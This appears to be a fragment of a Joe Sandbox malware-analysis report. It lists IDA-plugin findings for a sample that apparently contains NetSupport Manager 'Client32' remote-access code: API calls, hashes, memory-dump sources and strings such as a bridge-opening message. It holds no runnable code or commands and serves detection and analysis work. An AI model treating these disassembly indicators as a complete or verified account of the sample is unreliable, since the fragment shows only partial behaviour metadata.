                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 2755257978-4108050209
                                                                                                              • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                              • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                                              • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                                              • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 1101D1E0
                                                                                                              • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                                              • _memset.LIBCMT ref: 1101D20A
                                                                                                              • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                                              • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                                              • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                                              • String ID: NSMChatSizeWnd
                                                                                                              • API String ID: 2883038198-4119039562
                                                                                                              • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                              • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                                              • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                                              • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 1103D18F
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                                              • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                                              • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                                              • String ID: /247$" /a$RunAnnot
                                                                                                              • API String ID: 2581068044-4059077130
                                                                                                              • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                              • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                                              • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                                              • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                                              • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                                              • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                                              • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                                              • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                                              • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                                              • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                                              • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                                              • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 190572456-0
                                                                                                              • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                              • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                                              • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                                              • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                                              APIs
                                                                                                              • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                                              • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                                              • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                                              • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                                              • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                                              • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Object$Select$Stock$Clip$Brush
                                                                                                              • String ID:
                                                                                                              • API String ID: 2690518013-0
                                                                                                              • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                              • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                                              • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                                              • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                                              APIs
                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                                              • TranslateMessage.USER32(?), ref: 11027081
                                                                                                              • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                                              • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$DispatchSleepTranslate
                                                                                                              • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                              • API String ID: 3237117195-3850961587
                                                                                                              • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                              • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                                              • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                              • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                                              APIs
                                                                                                              • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                                              • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                                              • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                              • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                              • API String ID: 1092798621-1973987134
                                                                                                              • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                              • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                                              • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                              • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                                              APIs
                                                                                                                • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                                                • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                                                • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                                                • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                                                • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                                                • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                                                • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                                              • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                                              • _calloc.LIBCMT ref: 1112B3AD
                                                                                                              • _free.LIBCMT ref: 1112B44B
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                              • String ID: ntohl$ws2_32.dll
                                                                                                              • API String ID: 2881363997-4165132517
                                                                                                              • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                              • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                                              • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                              • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                                              APIs
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                                              • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                                              • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                                              • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                              • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                              • API String ID: 3960414890-2201682149
                                                                                                              • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                              • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                                              • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                              • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                                              APIs
                                                                                                              • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                                              • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                              • API String ID: 468487828-934300333
                                                                                                              • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                              • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                                              • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                                              • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                                              • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                                              • GetCursorPos.USER32(?), ref: 111192A1
                                                                                                              • GetTickCount.KERNEL32 ref: 111192B6
                                                                                                              • GetTickCount.KERNEL32 ref: 11119337
                                                                                                              • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                                              • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
